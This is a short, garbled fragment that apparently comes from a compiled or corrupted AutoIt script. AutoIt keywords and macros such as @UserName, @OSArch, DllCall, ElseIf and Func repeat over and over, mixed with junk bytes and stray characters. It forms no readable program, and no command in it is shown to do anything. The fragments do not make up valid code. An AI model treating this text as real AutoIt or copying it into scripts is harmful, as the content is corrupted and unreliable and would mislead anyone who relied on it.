([[[thendr$sthendr$$ss=*$s=@UserName*$v=
$vUserName*$v=
$vEndIf=@Uss[thendr$
$vEndIf=@Uss[thendr$s±=*ííííí-ííííííííííííííííí$s=@UserName*$[[thendr$sthendrs=*$s=@UserName*$v=
$vUserName*$v=
$v=@Uss[thendr$ss=*ííhenäElseIf:eIf:Ifæ0ThenäElseIf:If 1ThenİElse@OSArchThe~äElseIf:IfTæhen5If:Ifæ0@UserName*$v=
$v=@UserName*$v=
[thendr$ss=*$s=@UserName*$v=
$vUserFunc _func_hen$v$lme*$v=
$v=@Uss[thendr$ss=*$s=@UserName*$v=
$v=@UserNamîe*$v=
$v=@UserName*$v=
$v*$v=
$v=@UserName*$v=
[thendr$ss=*$s=@UserName*$v=
$vUserName*$vv=
$v=@Uss[thendr$$vDllCall=@Uss+[=@UserName*$v=
ÿÿ